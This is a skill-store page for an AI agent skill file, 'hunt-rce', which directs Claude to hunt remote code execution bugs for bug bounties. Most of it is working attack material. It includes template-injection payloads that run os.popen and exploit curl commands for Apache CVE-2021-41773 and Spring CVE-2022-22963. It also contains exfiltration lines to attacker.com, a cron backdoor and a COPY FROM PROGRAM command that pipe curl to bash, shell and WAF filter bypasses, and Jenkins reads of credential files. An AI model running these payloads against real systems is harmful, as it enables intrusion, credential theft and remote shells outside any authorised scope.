hunt-rce
Hunting skill for rce vulnerabilities. Built from 67 public bug bounty reports. Use when hunting rce on any target.
适合你,如果正在对任意目标进行RCE漏洞挖掘
用别的 agent?下载 .zip 解压,把文件夹放进它的技能目录
~/.claude/skills/(项目级 .claude/skills/)~/.codex/skills/npx oh-my-skill add elementalsouls/claude-bughunter/hunt-rcecurl -fsSL https://oh-my-skill.com/install.sh | bash -s -- elementalsouls/claude-bughunter/hunt-rcenpx oh-my-skill verify elementalsouls/claude-bughunter/hunt-rce怎么用
商店整理自技能原文 · 版本 05098fc · 表述以原文为准装上后,Claude 会按照 67 份公开漏洞报告总结的方法,帮你系统性地寻找远程代码执行漏洞。它会指导你识别高价值目标、攻击面信号,并执行分步检测。
当你要求 Claude 帮助寻找 RCE 漏洞,或提到相关关键词(如“命令执行”、“模板注入”)时触发。
技能原文 SKILL.md
Crown Jewel Targets
RCE vulnerabilities command the highest payouts in bug bounty programs because they grant attackers direct execution control over target infrastructure. The highest-value targets are:
Highest-paying asset types:
- Enterprise server products (GitHub Enterprise Server, self-hosted GitLab) — privilege escalation chains from low-privileged console roles to root SSH access consistently pay critical/high
- Supply chain / package registries — dependency confusion attacks against npm, PyPI, etc. hit critical severity across every major program
- Cloud-native infrastructure — exposed Kubernetes API servers, ingress controllers, and misconfiqured CI/CD pipelines
- Mobile app backends and OAuth flows — where server-side processing of attacker-controlled data meets execution contexts
- Admin/management consoles — template injection in configuration panels reaches root with a single payload
Why this class pays most:
- Blast radius is infrastructure-wide, not user-scoped
- Proof-of-concept is unambiguous — shell output is undeniable
- Fix requires architectural changes, not just a patch
- Programs cannot afford false negatives on RCE
Attack Surface Signals
URL Patterns
/management-console/* /admin/settings/* /api/v*/exec /api/v*/run /webhook/* /_internal/* /import?url= /render?template= /preview?format=
Response Headers / Tech Stack Signals
X-Powered-By: Express # Node.js — npm dependency surface X-Powered-By: Phusion Passenger Server: nginx (ingress-nginx) # Kubernetes ingress — path field injection X-Runtime: Ruby # Rails ActiveStorage, RDoc, REXML attack surface Content-Type: application/yaml # YAML parsers (SnakeYAML, Psych) — deserialization X-GitHub-Enterprise-Version # GHAS — nomad template, collectd, syslog-ng injection
JavaScript / Frontend Signals
// Look for these patterns in JS bundles
fetch('/api/exec', {method:'POST', body: cmd})
eval(userInput)
new Function(userInput)
document.write(unsafeData)
window.location = userControlled // URL scheme bypass → JS execution
Tech Stack Signals
| Signal | RCE Vector | |--------|-----------| | nomad in config UI | Template injection → {{ ... }} | | syslog-ng config editable | Config injection → program() destination | | collectd config editable | Plugin exec injection | | SnakeYAML in classpath | !!javax.script.ScriptEngineManager [...] | | npm package.json internal scope | Dependency confusion | | ingress-nginx annotations | Path field regex bypass |
Step-by-Step Hunting Methodology
- Map the execution contexts first. Before testing payloads, identify everywhere user-controlled input touches an execution layer: template engines, shell commands, YAML parsers, file paths used in operations, package resolution, and configuration files.
- Enumerate admin/management interfaces. Crawl for
/management-console,/admin,/_internal,/setup,/config. These surfaces are lower-auth and higher-privilege — the GHES cluster produced 6 separate RCEs from one console role.
- Check template injection in every config field. In any management UI that accepts free-form configuration (log destinations, notification formats, proxy settings), submit
{{7*7}},${7*7},<%= 7*7 %>. Look for49in responses, logs, or DNS callbacks.
- Test YAML/XML/serialized input for code execution. Any endpoint accepting
Content-Type: application/yamlorapplication/xml: - SnakeYAML: submit
!!javax.script.ScriptEngineManagergadget - Ruby YAML: submit
!ruby/object:Gem::Installergadget - REXML: submit billion-laughs / quadratic blowup XML
- Hunt dependency confusion. For every npm/pip/gem internal package name visible in JS bundles, error messages, or
package.jsonin public repos — register a higher-versioned package on the public registry pointing to a canary callback.
- Check file path operations for traversal → execution. ActiveStorage, file upload handlers, symlink operations: submit
../../../etc/cron.d/shellas filename. Confirm write then trigger execution.
- Audit Kubernetes/cloud-native surfaces. Run
kubectlagainst any exposed API server. Check ingress annotations, especiallynginx.ingress.kubernetes.io/configuration-snippetandspec.rules.http.paths.pathfor Lua/regex injection.
- Test OAuth redirect URI and URL scheme handlers. Mobile apps processing
javascript:orintent://URIs via OAuth redirect may execute JavaScript. Tryjavascript:alert(document.cookie)and custom scheme URIs.
- Verify with out-of-band callbacks. Never rely solely on visible output. Use Burp Collaborator, interactsh, or
canarytokens.orgDNS tokens. Blind RCE is common in backend processors.
- Chain privileges. A low-severity misconfiguration (editor role, CSRF, path traversal) combined with an RCE primitive equals critical. Always ask: "what can I reach from here?"
Payload & Detection Patterns
Template Injection Probes
# Generic polyglot — works across Jinja2, Twig, Freemarker, Pebble, Velocity
{{7*7}}${7*7}#{7*7}<%= 7*7 %>*{7*7}
{{'7'*7}}
{{config}}
{{self._TemplateReference__context.cycler.__init__.__globals__.os.popen('id').read()}}
# Nomad template injection (Go text/template)
{{ env "NOMAD_SECRET_ID" }}
{{ with secret "secret/data/prod" }}{{ .Data.password }}{{ end }}
{{ runscript "id" }}
Apache HTTP Server alias path traversal (CVE-2021-41773 / CVE-2021-42013)
Path normalization bug in Apache 2.4.49 (and the 2.4.50 patch-bypass) lets an attacker escape DocumentRoot via dot-encoded segments through configured alias paths. The same primitive yields very different impact depending on which alias accepts the traversal:
- Alias without
Options +ExecCGI(e.g./icons/) → arbitrary file read only - Alias with
Options +ExecCGI(e.g./cgi-bin/) → arbitrary code execution
Version fingerprint:
curl -sI http://target/ | grep -i "Server:" # Vulnerable: Apache/2.4.49 (CVE-2021-41773) or Apache/2.4.50 (CVE-2021-42013) # Patched: Apache/2.4.51+
File-read test (any alias):
curl --path-as-is "http://target/icons/.%2e/.%2e/.%2e/.%2e/etc/passwd" # Note: --path-as-is is REQUIRED — curl normalizes %2e by default
RCE test (cgi-enabled alias only):
curl --path-as-is -X POST \ -d "echo Content-Type: text/plain; echo; id; uname -a; hostname" \ "http://target/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh"
Triage discipline note: when the same path-traversal primitive works on multiple aliases but only one is CGI-enabled, the maximum impact is the severity — not the average. A "file read" finding on /icons/ should always be escalated by re-probing /cgi-bin/ (and any other alias visible from <Directory> blocks in the server-info disclosure or response patterns). See triage-validation Pre-Severity Gate.
Spring Cloud Function SpEL injection (CVE-2022-22963)
Spring Cloud Function ≤ 3.2.2 (and ≤ 3.1.6) evaluates the spring.cloud.function.routing-expression header as a SpEL expression on the /functionRouter endpoint without auth, before any routing logic. Wide deployment in AWS Lambda + Cloud Run + on-prem function platforms. Often exposed externally because /functionRouter auto-registers and devs don't add an explicit gate.
Detection:
- Spring-style port 8080 with
/uppercase,/lowercase, or arbitrary single-word function endpoints responding 200 - Confirm with
curl -s http://target:8080/uppercase -H "Content-Type: text/plain" --data-binary "test"→ returnsTEST - Version banner via
/actuator/infoor response headers
Exploit:
curl -X POST http://target:8080/functionRouter \
-H "Content-Type: text/plain" \
-H 'spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec(new String[]{"id"})' \
--data "x"
The new String[]{"...", "..."} array form avoids shell-quoting issues that break the more common .exec("id") form when the SpEL header contains parentheses or quotes.
Generalizes to: any Spring application that takes user input into a SpelExpressionParser.parseExpression() call, especially when delivered via header / query-param routes that bypass normal auth filters. See hunt-ssti for the broader SpEL fingerprinting (*{7*7} = Spring Thymeleaf).
SnakeYAML RCE Gadget
!!javax.script.ScriptEngineManager [
!!java.net.URLClassLoader [[
!!java.net.URL ["http://attacker.com/exploit.jar"]
]]
]
Ruby YAML / rdoc_options RCE
--- !ruby/object:Gem::Installer i: x
Dependency Confusion Detection
# Find internal package names grep -r '"name"' node_modules/ | grep '@internal\|@company\|@private' # Check if public registry has higher version npm view @target-company/internal-package version 2>/dev/null
Ingress-nginx Path Injection
# In spec.rules.http.paths.path /something)(;.*);# # Results in nginx config injection
Kubernetes Exposed API Check
curl -sk https://TARGET:6443/api/v1/namespaces/default/pods \ -H "Authorization: Bearer $(cat /var/run/secrets/kubernetes.io/serviceaccount/token)" kubectl --insecure-skip-tls-verify -s https://TARGET:6443 get pods --all-namespaces
Out-of-Band RCE Confirmation
# Payload to confirm blind RCE via DNS curl "http://$(id | base64).YOUR-INTERACTSH-URL/" nslookup $(whoami).attacker.com wget http://attacker.com/$(cat /etc/hostname)
ActiveStorage Path Traversal → RCE
# Filename in upload request filename="../../../../etc/cron.d/backdoor" # Cron payload content * * * * * root curl http://attacker.com/shell | bash
Args4j @-prefix file expansion (Jenkins CVE-2024-23897 family)
Java CLIs built on the args4j library default to expandAtFiles=true, which expands @filename arguments by reading the file and treating each line as a separate command argument. When such a CLI is exposed over HTTP (Jenkins CLI is the canonical case), the server-side error message echoes failed arguments back — turning argument echoing into an arbitrary file-read primitive. Unauthenticated when "anonymous read access" is on (Jenkins default for fresh installs).
Detection:
- Target exposes
/cliand/jnlpJars/jenkins-cli.jar(Jenkins family) - Or: any Java app whose CLI source uses args4j without
expandAtFiles=false
Test (Jenkins):
# Get the legit CLI jar from the target curl -sLO http://target:8080/jnlpJars/jenkins-cli.jar # First line of file leaks via 'help' error java -jar jenkins-cli.jar -s http://target:8080/ -http help 1 @/etc/passwd # → ERROR: Too many arguments: root:x:0:0:root:/root:/bin/bash # Full file leaks via 'connect-node' (every line returned as a "no such agent" error) java -jar jenkins-cli.jar -s http://target:8080/ -http connect-node @/etc/passwd # → All passwd lines echoed back # Recon: env vars + JENKINS_HOME path java -jar jenkins-cli.jar -s http://target:8080/ -http help 1 @/proc/self/environ
Crown-jewel files after JENKINS_HOME confirmed:
/var/jenkins_home/secret.key— master encryption key for stored credentials/var/jenkins_home/secrets/master.key— derives the encryption key/var/jenkins_home/credentials.xml— credential store (encrypted with secret.key — pair with offline decrypt tools)/var/jenkins_home/users/*/config.xml— per-user API tokens (often unencrypted)/var/jenkins_home/jobs/*/config.xml— pipeline configs that may inline AWS keys, SSH keys, registry tokens
Pattern generalizes beyond Jenkins. Any Java service that:
- Embeds args4j (most enterprise Java CLIs since 2010s)
- Exposes the CLI handler over HTTP (Jenkins, Hudson forks, custom internal tools)
- Returns argument-parsing errors verbatim to the client
→ same arbitrary-read primitive applies. Validation via triage-validation Reproducibility Gate: confirm the leak on at least 2 distinct commands (e.g., help and connect-node) and verify the file content actually appears in the response, not just a generic 500.
Grep Patterns for Source Review
# Command injection sinks
grep -rn "exec\|system\|popen\|spawn\|eval\|subprocess" --include="*.rb" .
grep -rn "Runtime.exec\|ProcessBuilder\|ScriptEngine" --include="*.java" .
# Template engine instantiation
grep -rn "Mustache\|Handlebars\|nunjucks\|render_template\|Template\(" .
# Unsafe YAML load
grep -rn "yaml\.load\b\|YAML\.load\b" . # without Loader= argument
grep -rn "Yaml()\|new Yaml()" --include="*.java" .
Common Root Causes
1. Configuration-as-code with insufficient sanitization Administrators edit configuration files (syslog-ng, collectd, nomad) through web UIs. Developers assume admin == trusted, so they pass field values directly into config files that support execution primitives (program() destinations, exec plugins, template functions).
2. Template engines in privileged contexts Go's text/template, Freemarker, Velocity, and Twig are used for system configuration rendering. When user-controlled strings reach these engines without sandboxing, arbitrary code follows.
3. Dependency confusion / namespace squatting Internal packages published to private registries without locking the public registry namespace. Build systems that prefer public registries by default, or that fall through to public when the private registry lacks a package.
4. Unsafe deserialization of YAML/XML Developers use YAML.load() without safe loaders, or new Yaml() (SnakeYAML) without type restrictions. Ruby's YAML.load and Java's SnakeYAML both support arbitrary object instantiation by default.
5. Path traversal in file operation chains Filenames accepted from user input are used in filesystem operations without normalization. Rails ActiveStorage, file upload handlers, and rdoc generators trust the filename parameter.
6. Assuming low-privilege roles can't reach execution contexts The GHES management console granted "Editor" roles access to configuration fields that touched shell execution. Developers assumed privilege boundaries existed at a higher architectural level.
7. Missing input validation on infrastructure-facing fields Ingress/nginx annotation values, Kubernetes spec fields, and webhook URLs are treated as opaque strings — but the downstream processor (nginx config generator, regex engine) interprets them as code.
Bypass Techniques
Bypass: Shell metacharacter filtering
# Blocked: ; | & ` $()
# Bypass using $IFS and encodings
cat${IFS}/etc/passwd
{cat,/etc/passwd}
$'\x63\x61\x74' /etc/passwd # hex encoding
$(printf '\x63\x61\x74') /etc/passwd
# Newline injection when semicolons blocked
payload=$'\ncurl attacker.com\n'
Bypass: URL scheme allowlist (javascript: blocked)
# Mobile apps often block javascript: but miss: jAvAsCrIpT:alert(1) # case variation javascript:alert(1) # HTML entity javascript:void(alert(1)) # void wrapper intent://attacker.com#Intent;scheme=javascript;... data:text/html,<script>alert(1)</script>
Bypass: YAML safe_load / type restrictions
# If !!java.* is blocked, try legitimate classes with side effects !!com.sun.rowset.JdbcRowSetImpl dataSourceName: 'ldap://attacker.com/a' autoCommit: true # Or find allowlisted types with dangerous constructors
Bypass: npm scope restrictions
# If @company/* is monitored, look for unscoped internal names # e.g., "internal-utils" instead of "@company/internal-utils" # Public registries serve unscoped packages first
Bypass: Path traversal filters
# Basic filter bypass ../ → ..%2F → %2e%2e%2f → ....// # Double encoding %252e%252e%252f # Unicode normalization ..%c0%af (overlong UTF-8) # Null byte (older systems) ../../etc/passwd%00.jpg
Bypass: Template injection with output filtering
# If {{ }} is sanitized on output but not evaluation:
{% for x in range(1) %}{{ lipsum.__globals__.os.popen('id').read() }}{% endfor %}
# Blind — use DNS callback instead of output
{{ lipsum.__globals__.os.popen('nslookup $(id).attacker.com').read() }}
Bypass: WAF blocking exec, system, popen
# Ruby
send(:system, "id")
method(:exec).call("id")
Kernel.send(:`, "id")
Object.const_get(:Kernel).system("id")
Gate 0 Validation
Before writing the report, confirm all three:
1. What can the attacker DO right now? You must be able to demonstrate one of: execute id/whoami and capture the output, make a DNS/HTTP callback from the target server to your controlled host, write a file to the filesystem, or read /etc/passwd. "Might be able to" fails this gate.
2. What does the victim LOSE? Articulate the concrete impact: source code exfiltration, credential theft (database, API keys, cloud IAM), lateral movement to internal network, supply chain compromise of downstream users, data destruction. Generic "attacker gains RCE" fails — name the crown jewels at risk.
3. Can it be reproduced in 10 minutes from scratch? Write the reproduction steps before submitting. If you need more than: (a) a Burp request, (b) a payload file, and (c) a listener — simplify it. If reproduction requires a specific race condition, timing, or ephemeral state, document the exact conditions. Triagers who can't reproduce in one attempt will downgrade or close the report.
Real Impact Examples
Scenario A: Management Console Role → Root Shell (Enterprise Server) An attacker with a low-privileged "Management Console Editor" account on a GitHub Enterprise Server instance identified that the syslog-ng configuration UI accepted a free-form "destination" field. By injecting a program() destination containing a reverse shell command, the attacker caused the syslog-ng daemon (running as root) to execute arbitrary OS commands upon log receipt. The same attack surface was independently found in collectd's exec plugin configuration and nomad's job template rendering — all reachable from the same editor role. Impact: full root compromise of the enterprise git server hosting all organization source code, secrets, and CI/CD pipelines.
Scenario B: Dependency Confusion → RCE on Build Infrastructure A researcher enumerated internal npm package names by reviewing JavaScript bundles served from target CDN endpoints and public GitHub repositories belonging to a major payments platform. Several @internal/* scoped packages were referenced but not registered on the public npm registry. The researcher published higher-versioned packages with identical names containing a postinstall script that executed a canary callback. Within hours, the callback fired from multiple IP addresses belonging to the target's CI/CD build farm — confirming that every npm install on their build infrastructure executed attacker-controlled code. The same technique worked against a ride-sharing platform's internal tooling. Impact: arbitrary code execution on build servers with access to production deployment credentials and signing keys.
Scenario C: Exposed Kubernetes API → Cluster Takeover During reconnaissance on a target's cloud infrastructure, a researcher discovered a publicly accessible Kubernetes API server (port 6443) with overly permissive RBAC. Using default service account tokens and unauthenticated API calls, the researcher enumerated running pods, retrieved secrets from the default namespace (including database credentials and third-party API keys), and demonstrated the ability to spawn privileged pods with hostPID: true — enabling full node compromise. The Kubernetes cluster managed the target's core production services. Impact: access to all stored secrets, ability to deploy malicious workloads, and pivot to every service in the cluster.
Chains & Compositions (Senior Hunting)
RCE in 2020-2026 rarely arrives at a single sink. Every modern RCE is composed of (1) a primitive that puts attacker bytes onto the host or into a deserialization pipeline, plus (2) an exec gadget that interprets them. The chains below decompose six high-paying RCE shapes into their primitive components — each step is testable in isolation, the chain is what pays.
Chain 1 — SSRF + IMDSv1 + Leaked IAM Role → Lambda Invoke → Backend RCE (Capital One pattern)
- A. SSRF on a server-side fetcher (link-preview, image proxy, webhook URL, PDF generator). Confirmed via Burp Collaborator OOB callback.
- B. Point SSRF at AWS IMDSv1 metadata:
http://169.254.169.254/latest/meta-data/iam/security-credentials/<role>→ returns temporary STS credentials. - C. Use the credentials with
aws lambda invoke --function-name <internal-function>— Lambda runs server-side code that the attacker can influence via the function's input parameter. - Impact: Full backend RCE in the Lambda context, plus pivot path to whatever else the role grants (S3 / DynamoDB / RDS).
- Real shape: Capital One 2019 — $80M civil penalty, attacker conviction. SSRF in a WAF on EC2 → IMDSv1 → IAM role → 106M-record breach via S3 sync. Cross-refs
hunt-ssrfDisclosed Report Citation #6.
Chain 2 — SQLi + COPY FROM PROGRAM → Direct OS-level RCE on Postgres Host
- A. SQLi confirmed on a Postgres backend (boolean/time-based works; UNION not needed).
- B. The DB user has either
pg_read_server_filesorCOPYprivileges (default for many AWS RDS / Google Cloud SQL roles when "admin" databases exist). - C. Stack a query:
'; COPY users FROM PROGRAM 'curl http://attacker/x.sh | bash'; --→ Postgres shells out to/bin/sh -c <attacker command>→ RCE aspostgresuser. - Impact: RCE as the database user, which on managed Postgres frequently has IAM credentials and direct access to other AWS resources.
- Real shape: Multiple H1 disclosures 2020-2024 across SaaS apps backed by Postgres. Cross-refs
hunt-sqliDisclosed Report Citation #12 and root cause discussion ofFILE/xp_cmdshellprivileges.
Chain 3 — Image Upload + Path Traversal in Filename + Misconfigured MIME Serving → Webshell
- A. File upload accepts images (
image/png,image/jpeg). The server saves with the user-supplied filename or only validates Content-Type, not actual content. - B. Upload a
.aspx/.jsp/.phpfile with the correct image magic-bytes (GIF89a+ PHP after) and a filename containing../to write outside the upload directory into the web-root (../../../public/webshell.php). - C. Request
https://target/webshell.php?cmd=id— server's PHP/ASP.NET handler runs the script regardless of extension policy because the path doesn't pass through the upload-dir filter. - Impact: Unauthenticated or low-priv attacker gets webshell on the application server with the web-server's process privileges.
- Real shape: Multiple disclosed H1 cases on legacy upload handlers; canonical pre-2020 RCE class. Pairs with
hunt-file-upload(upload bypass table) andhunt-miscpath-traversal patterns.
Chain 4 — Prototype Pollution + Lodash/Mongoose Gadget Chain → child_process.spawn → Node RCE
- A. Identify prototype pollution sink — JSON merge / Object.assign / lodash
_.merge/ NodeObject.createchain receiving attacker JSON. - B. Pollute
Object.prototype.shelltotrueORObject.prototype.env.NODE_OPTIONSto--require ./malicious.js. The polluted prototype reaches a downstreamchild_process.spawnorvm.runInThisContext. - C. Sink executes with attacker-controlled shell/env → attacker code runs in Node.js process context with full access to environment variables, AWS metadata, internal services.
- Impact: Server-side JS execution from a JSON POST. Common in Express apps using
body-parser+lodash.mergefor config-merging. - Real shape:
lodash.mergeCVE-2018-16487, CVE-2019-10744, CVE-2020-8203;mongooseCVE-2024-53900 (cross-refshunt-sqliDisclosed Report Citation #10 — same gadget family reaches Mongo$whereinstead of process).
Chain 5 — Unencrypted ViewState + Recovered MachineKey → ASP.NET Deserialization → RCE (ToolShell class)
- A. Identify an ASP.NET endpoint where
__VIEWSTATEENCRYPTED=""(ViewState is signed but not encrypted). Confirm via Burp / curl on form-bearing pages. - B. Recover the
<machineKey>validationKey — via config leak (/web.configaccessible), via subdomain takeover of a sibling app sharing the key, or via the CVE-2025-53771 ToolShell exploit chain that exfils the key on Subscription Edition. - C. Forge a ViewState using
ysoserial.net --plugin=ViewState --validationkey=<key>with aTypeConfuseDelegate/WindowsIdentitypayload. Submit to the endpoint. ASP.NET deserialises into a method-call gadget chain ending inProcess.Start→ RCE as the worker-process identity. - Impact: Full RCE on the IIS web front-end with whatever the AppPool identity grants — often
NETWORK SERVICE(with SharePoint farm-account access) or higher. - Real shape: CVE-2025-53770 / 53771 ToolShell (July 2025 emergency advisory); SP2013 unpatched-by-EoL exposure. Cross-refs
hunt-sharepointToolShell precondition chain andhunt-aspnetViewState dual-parser anti-pattern.
Chain 6 — XXE + PHP expect:// Stream Wrapper → Direct RCE on Legacy PHP
- A. XXE confirmed via OOB DTD callback (
<!ENTITY % x SYSTEM "http://attacker/dtd">). - B. Target runs PHP with the
expectextension enabled (rare in 2026, but still present on legacy hosts and some shared-hosting providers). - C. Send
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "expect://id">]><foo>&xxe;</foo>— PHP's stream wrapper executesidthrough expect → output returned in entity expansion or via OOB. - Impact: RCE as the PHP/web-server user without needing a separate upload or SQLi primitive.
- Real shape: Rockstar Games emblem editor XXE H1 #347139 (2018, $1,500); Adobe Commerce CosmicSting CVE-2024-34102 (XXE → RCE via crypt-key exfil). Cross-refs
hunt-xxeDisclosed Report Citation #7 and #10.
Operator-level pattern
Every modern RCE chain has two halves: the bytes get there (SSRF, SQLi, upload, prototype-pollution, ViewState, XXE) and the bytes get interpreted (lambda invoke, COPY PROGRAM, webshell handler, child_process.spawn, deserializer gadget, expect://). Hunt for the first half; the second is usually one of the six above. If your first-half primitive doesn't compose with any of these — pause before submitting. "Could lead to RCE" is Low/Medium; "RCE demonstrated end-to-end" is Critical.
Cross-references:
hunt-ssrf— Chain 1hunt-sqli— Chain 2hunt-file-upload— Chain 3hunt-api-misconfig(proto-pollution) — Chain 4hunt-sharepoint+hunt-aspnet— Chain 5hunt-xxe— Chain 6
Related Skills & Chains
hunt-ssti— Template engines that hiteval()/exec()/os.system()are RCE hiding behind a render call. Chain primitive: Jinja2{{config.__class__.__init__.__globals__['os'].popen('id').read()}}reflected in email-template preview → unauthenticated RCE as the worker process.hunt-file-upload— File-write primitives become RCE when the upload directory is web-served, processed by a deserializer, or loaded by a.htaccess/web.config. Chain primitive: SVG/PHP polyglot bypasses MIME check → directGET /uploads/shell.php?cmd=id→ RCE; or DOCX withphar://stream wrapper → PHP object deserialization → RCE.hunt-ssrf— When the RCE primitive lives on an internal-only endpoint (admin console, internal Redis, Jenkins script-console), gate it through an SSRF. Chain primitive: external SSRF →http://127.0.0.1:8080/manage/scriptText(Jenkins/Tomcat) → GroovyRuntime.exec→ RCE; or SSRF →gopher://redis:6379write to crontab → RCE.hunt-aspnet— ASP.NET ViewState deserialization is a giant RCE class behind a known__VIEWSTATEparameter. Chain primitive: machineKey recovery (or leaked<machineKey>fromweb.configdisclosure) →ysoserial.net -p ViewState -g TypeConfuseDelegate→ RCE asIIS APPPOOL\<name>.security-arsenal— Reach for the deserialization payload tree (ysoserial Java gadget chains, ysoserial.net for .NET ViewState/BinaryFormatter, Python pickle__reduce__, Ruby Marshal, PHPphar://metadata, Nodenode-serializeIIFE) the moment you have a sink that accepts serialized bytes.triage-validation— Apply the Pre-Severity Gate before claiming Critical. A "blind RCE" that turns out to be file-write-only with no execution path is not RCE; a sandboxed eval that can't reachosis at best Medium SSTI. Provewhoami/OOB DNS callback with a unique marker before writing the report.